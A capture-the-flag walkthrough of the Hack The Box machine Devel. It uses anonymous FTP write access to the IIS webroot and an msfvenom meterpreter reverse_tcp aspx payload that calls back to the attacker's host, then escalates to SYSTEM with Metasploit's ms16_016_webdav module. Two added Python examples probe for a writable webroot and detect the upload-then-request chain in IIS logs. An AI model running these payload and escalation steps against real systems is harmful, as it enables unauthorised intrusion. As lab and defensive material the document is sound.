Devel is a relatively easy Hack The Box Windows machine that can be done almost entirely with Metasploit.
Let's run nmap with nmap -sC -sT -oA nmap -n 10.10.10.5 (to check what each option does, simply type nmap --help).
┌─[✗]─[luka@parrot]─[~/Desktop/htb/Devel/nmap]
└──╼ $sudo nmap -sC -sT -oA nmap -n 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-19 20:32 CET
Nmap scan report for 10.10.10.5
Host is up (0.028s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
| 03-21-19  10:13PM               914405 ipsec.aspx
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS7
Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds
Before checking the FTP server it is normally wise to start gobuster/dirbuster in the background. On this box it didn't find anything though.
We can log in to the FTP server with anonymous credentials (user anonymous, any password). We have write privileges as well.
A test file transferred successfully, and the uploaded file is also visible on the web server in the browser: the anonymous FTP directory is the IIS webroot, so anything we STOR is served over HTTP.
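The manual check above (upload a test file over FTP, then look for it in the browser) scripted as a probe. This is an added example and not code from the original write-up: it uploads a uniquely named marker, requests it over HTTP, compares the bytes and cleans up. 10.10.10.5 is the Devel address from the scan; the marker name and body are generated here, and FakeTarget is a constructed stand-in so the logic can be exercised offline.

```python
"""Check whether anonymous FTP writes land in the IIS webroot (added example)."""
import ftplib
import io
import secrets
import sys
import urllib.error
import urllib.request

ANON_USER, ANON_PASS = "anonymous", "anon@example.com"   # any password is accepted for anonymous


def make_marker():
    """Return (name, body) for a one-off probe file that cannot collide with real content."""
    token = secrets.token_hex(8)
    return f"probe_{token}.txt", f"ftp-webroot-probe {token}\n".encode()


class LiveTarget:
    """Real FTP + HTTP endpoints. Every network error is reported as a failed step."""

    def __init__(self, ftp_host, http_base, timeout=10):
        self.ftp_host, self.http_base, self.timeout = ftp_host, http_base.rstrip("/"), timeout

    def upload(self, name, data):
        try:
            with ftplib.FTP(self.ftp_host, timeout=self.timeout) as ftp:
                ftp.login(ANON_USER, ANON_PASS)
                ftp.storbinary(f"STOR {name}", io.BytesIO(data))
            return True
        except ftplib.all_errors:
            return False

    def fetch(self, name):
        try:
            with urllib.request.urlopen(f"{self.http_base}/{name}", timeout=self.timeout) as resp:
                return resp.read()
        except (urllib.error.URLError, OSError):   # 404, connection refused, timeout, ...
            return None

    def delete(self, name):
        try:
            with ftplib.FTP(self.ftp_host, timeout=self.timeout) as ftp:
                ftp.login(ANON_USER, ANON_PASS)
                ftp.delete(name)
        except ftplib.all_errors:
            pass   # best effort; a leftover text marker is harmless


class FakeTarget:
    """Constructed test double (no network). shared=True models Devel: FTP root == webroot."""

    def __init__(self, writable=True, shared=True):
        self.writable, self.shared, self.files = writable, shared, {}

    def upload(self, name, data):
        if not self.writable:
            return False
        self.files[name] = data
        return True

    def fetch(self, name):
        return self.files.get(name) if self.shared else None

    def delete(self, name):
        self.files.pop(name, None)


def probe(target):
    """Classify the target: no-anonymous-write, writable-not-served, or writable-webroot."""
    name, body = make_marker()
    if not target.upload(name, body):
        return "no-anonymous-write"
    served = target.fetch(name)
    target.delete(name)                 # leave no trace behind
    if served == body:
        return "writable-webroot"       # the Devel case: a STOR'd .aspx would be executed by IIS
    return "writable-not-served"        # writable, but this directory is not the served webroot


if __name__ == "__main__":
    print("offline demo:", probe(FakeTarget()))
    if len(sys.argv) > 1:               # e.g. python probe.py 10.10.10.5
        host = sys.argv[1]
        print(host + ":", probe(LiveTarget(host, f"http://{host}/")))
```

The marker is a .txt rather than an .aspx on purpose: the verdict "writable-webroot" is already enough to know that a server-side page would run, and the probe never leaves executable content on the target.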
Exploitation / Initial Foothold
We can obviously upload and run aspx files, so let's create a payload with msfvenom. I used the shikata_ga_nai encoder, which would not really help if some kind of protection like antivirus/Windows Defender were active. I will use meterpreter for this box.
┌─[root@parrot]─[/home/luka/Desktop/htb/Devel/payload]
└──╼ #msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.5 LHOST=10.10.14.68 LPORT=5555 -e x86/shikata_ga_nai -o payload.aspx -f aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of aspx file: 2960 bytes
Saved as: payload.aspx
The payload was uploaded to the server from the FTP session using “put payload.aspx”.
Start a listener first (exploit/multi/handler with the same payload, LHOST and LPORT as the msfvenom command), then request payload.aspx in the browser. If everything was set up correctly, a new meterpreter session appears.
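The same chain seen from the server side. This is an added example, not code from the original write-up: it correlates an FTP STOR with a later HTTP request for the same file name, which is exactly the footprint the upload-and-browse steps above leave in IIS logs. The two logs are constructed to mimic that footprint (not captured from the real machine); the FTP column layout is an assumption, so the parser reads the #Fields header rather than hard-coding positions.

```python
"""Detect an FTP-upload-then-HTTP-request chain in W3C-format IIS logs (added example)."""
from collections import namedtuple
from datetime import datetime, timedelta

# Constructed sample logs. Field names follow the W3C extended log format IIS writes;
# check the #Fields line of your own logs, the parser adapts to whatever it says.
FTP_LOG = """\
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status
2019-03-21 22:12:40 10.10.14.68 - 10.10.10.5 21 USER anonymous 331
2019-03-21 22:12:41 10.10.14.68 anonymous 10.10.10.5 21 PASS *** 230
2019-03-21 22:13:05 10.10.14.68 anonymous 10.10.10.5 21 STOR payload.aspx 226
2019-03-21 22:13:30 10.10.14.68 anonymous 10.10.10.5 21 STOR notes.txt 226
"""

HTTP_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2019-03-21 22:13:22 10.10.10.5 GET /payload.aspx - 80 - 10.10.14.68 Mozilla/5.0 200
2019-03-21 22:14:01 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.68 Mozilla/5.0 200
2019-03-21 22:20:00 10.10.10.5 GET /notes.txt - 80 - 10.10.14.68 Mozilla/5.0 200
"""

# Extensions IIS executes (or that change its behaviour) rather than serves as static files.
EXEC_EXT = (".aspx", ".asp", ".ashx", ".asmx", ".asax", ".config", ".dll", ".exe")

Hit = namedtuple("Hit", "name uploader uploaded_at requested_at requester severity")


def parse_w3c(text):
    """Parse a W3C extended log into dicts keyed by the names in its #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):      # skip truncated lines instead of misaligning columns
                rows.append(dict(zip(fields, values)))
    return rows


def _when(row):
    return datetime.fromisoformat(f"{row['date']} {row['time']}")


def _basename(uri):
    return uri.rsplit("/", 1)[-1].lower()


def upload_then_request(ftp_rows, http_rows, window=timedelta(minutes=15)):
    """One Hit per successful FTP STOR whose file is requested over HTTP within `window`."""
    hits = []
    for up in ftp_rows:
        if up["cs-method"].upper() != "STOR" or not up["sc-status"].startswith("2"):
            continue
        name, t_up = _basename(up["cs-uri-stem"]), _when(up)
        for req in http_rows:
            if _basename(req["cs-uri-stem"]) != name:
                continue
            t_req = _when(req)
            if t_up <= t_req <= t_up + window:
                # server-side code dropped over FTP and then executed: the Devel foothold
                severity = "high" if name.endswith(EXEC_EXT) else "low"
                hits.append(Hit(name, up["cs-username"], t_up, t_req, req["c-ip"], severity))
    return hits


def analyze(ftp_log=FTP_LOG, http_log=HTTP_LOG, window_minutes=15):
    return upload_then_request(parse_w3c(ftp_log), parse_w3c(http_log),
                               window=timedelta(minutes=window_minutes))


if __name__ == "__main__":
    for h in analyze():
        print(f"{h.severity:4} {h.name:<14} STOR by {h.uploader} @ {h.uploaded_at}  "
              f"GET by {h.requester} @ {h.requested_at}")
```

The uploader is kept in each Hit because a STOR by a real deployment account followed by a GET is normal release traffic; an anonymous STOR of an .aspx that is requested seconds later is not.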
meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows
meterpreter > getuid
Server username: IIS APPPOOL\Web
Since this is an unpatched Windows 7 system, there is more than one option for escalating privileges. One way is to use the local exploit suggester module from Metasploit: “use post/multi/recon/local_exploit_suggester”, then point it at the session with “set SESSION <id>” and run it.
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.10.5 - Collecting local exploits for x86/windows…
[*] 10.10.10.5 - 29 exploit checks are being tried…
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
Another way is a more granular search. This also shows the Rank of each exploit, which can make the decision easier (-S filters the result rows with a regular expression):
“search platform:windows type:exploit arch:x86 -S privilege”
I used exploit/windows/local/ms16_016_webdav for privilege escalation. The suggester could only report it as “could not be validated”, but it works on this box. Set SESSION to the meterpreter session and LHOST to the VPN interface address (the tun0 address used for the payload above) so the new session can call back.
msf5 exploit(windows/local/ms16_016_webdav) > run
[*] Started reverse TCP handler on 192.168.0.190:4444
[*] Launching notepad to host the exploit…
[+] Process 3068 launched.
[*] Reflectively injecting the exploit DLL into 3068…
[*] Exploit injected … injecting payload into 3068…
[*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
Running ps in meterpreter shows that the exploit created a new process, notepad.exe, running as SYSTEM. Note that the handler above listened on 192.168.0.190:4444, a LAN address the target cannot reach over the HTB VPN, so no second session came back; the injected notepad.exe is still SYSTEM, though, and that is enough.
 PID   PPID  Name         Arch  Session  User                 Path
 3068  2096  notepad.exe  x86   0        NT AUTHORITY\SYSTEM  C:\Windows\system32\notepad.exe
I migrated into that process. Once meterpreter lives inside a SYSTEM process it already runs with that token, so the getsystem call below is redundant here (it succeeds immediately via named pipe impersonation); getuid confirms the result.
meterpreter > migrate 3068
[*] Migrating from 2052 to 3068
zlib(finalizer): the stream was freed prematurely.
[*] Migration completed successfully.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
To switch from meterpreter to a command shell you simply type shell at the meterpreter prompt; Ctrl+Z backgrounds the channel and gets you back into meterpreter.
c:\Users\babis\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 8620-71F1

 Directory of c:\Users\babis\Desktop

18/03/2017  01:14    <DIR>          .
18/03/2017  01:14    <DIR>          ..
18/03/2017  01:18                32 user.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.573.169.664 bytes free

c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
*deleted*

 Directory of c:\Users\Administrator\Desktop

18/03/2017  01:17    <DIR>          .
18/03/2017  01:17    <DIR>          ..
18/03/2017  01:17                32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  24.573.169.664 bytes free

c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
*deleted*
We now have SYSTEM privileges on the box and both flags can be read.